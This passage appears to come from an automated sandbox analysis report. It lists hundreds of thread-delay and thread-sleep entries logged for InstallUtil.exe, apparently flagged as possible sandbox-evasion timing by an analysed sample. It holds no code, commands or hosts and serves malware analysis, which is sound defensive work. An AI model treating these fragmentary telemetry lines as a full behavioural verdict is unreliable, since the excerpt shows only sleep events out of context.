                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594063Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599873Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599580Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599452Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599279Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599017Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598905Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598671Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598553Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598422Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598312Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598202Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598093Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597872Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597640Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597421Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597312Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597202Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597093Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596714Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596608Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596374Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596042Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595911Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595551Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595436Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595327Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595203Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595093Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594523Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594420Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594310Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593608Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593499Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599874
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599546
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599064
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598953
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598844
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598719
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598391
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598281
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598062
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597953
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597844
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597734
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597625
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597516
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597391
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597266
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597047
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596937
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596815
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596702
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596592
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596478
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596375
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596265
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596047
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595922
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595812
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595703
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595594
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595469
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595359
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595141
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595031
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594922
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594812
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594703
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594594
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594475
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594359
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594097
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2619Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 7208Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 5259Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 4551Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 5657
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 4185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep count: 37 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4796Thread sleep count: 2619 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -599873s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4796Thread sleep count: 7208 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -599766s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -599656s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -599542s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -599422s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -599313s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -599188s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -599063s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -598938s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -598827s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -598718s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -598578s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -598467s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -598357s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -598250s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -598141s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -598031s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -597922s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -597810s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -597703s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -597594s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -597485s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -597360s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -597235s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -597110s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -596985s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -596860s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -596735s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -596610s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -596485s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -596360s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -596235s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -596109s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -595951s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -595844s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -595688s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -595562s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -595453s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -595344s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -595235s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -595110s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -594985s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -594859s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -594750s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -594641s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -594531s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -594422s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -594313s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -594188s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5804Thread sleep time: -594063s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep count: 35 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7104Thread sleep count: 5259 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -599873s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -599750s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -599580s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -599452s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -599279s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7104Thread sleep count: 4551 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -599156s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -599017s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -598905s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -598781s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -598671s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -598553s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -598422s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -598312s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -598202s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -598093s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -597984s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -597872s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -597750s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -597640s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -597531s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -597421s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -597312s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -597202s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -597093s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -596714s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -596608s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -596484s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -596374s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -596265s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -596156s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -596042s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -595911s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -595781s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -595672s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -595551s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -595436s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -595327s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -595203s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -595093s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -594984s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -594875s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -594765s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -594656s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -594523s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -594420s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -594310s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -594062s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -593937s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -593828s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -593718s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -593608s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -593499s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3624Thread sleep time: -593375s >= -30000sJump to behavior
